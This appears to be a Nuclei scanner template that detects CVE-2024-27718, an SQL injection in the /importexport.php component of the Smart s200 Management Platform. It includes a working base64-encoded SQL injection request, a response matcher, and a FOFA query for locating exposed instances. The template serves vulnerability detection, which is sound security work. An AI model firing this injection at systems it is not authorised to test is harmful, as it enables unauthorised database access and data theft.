id: CVE-2024-27718 info: name: Smart s200 Management Platform v.S200 - SQL Injection author: DhiyaneshDk severity: high description: | SQL Injection vulnerability in Baizhuo Network Smart s200 Management Platform v.S200 allows a local attacker to obtain sensitive information and escalate privileges via the /importexport.php component. impact: | Authenticated attackers can extract sensitive database information via SQL injection in the importexport.php component. remediation: | Update Smart s200 Management Platform to a version that addresses CVE-2024-27718. reference: - https://github.com/tldjgggg/cve/blob/main/sql.md classification: epss-score: 0.01101 epss-percentile: 0.64359 metadata: verified: true max-request: 1 fofa-query: body="Smart管理平台" tags: cve,cve2024,smart-s45f,sqli,vuln variables: num: "{{rand_int(9000000, 9999999)}}" cmd: "select+9,md5({{num}}),9" http: - raw: - | GET /importexport.php?sql={{base64(cmd)}}&type=exportexcelbysql HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "{{md5(num)}}" - type: word part: header words: - 'application/octet-stream' - type: status status: - 200 # digest: 4a0a00473045022053a8a19a9481ef61fbcca4ebc4eb3ca9dd803c48c9aea931df86b44f6ba820a3022100c29a6389733353d47527733095ea11d8084e7efd38331cbc79d7e1a63537e949:922c64590222798bb761d5b6d8e72950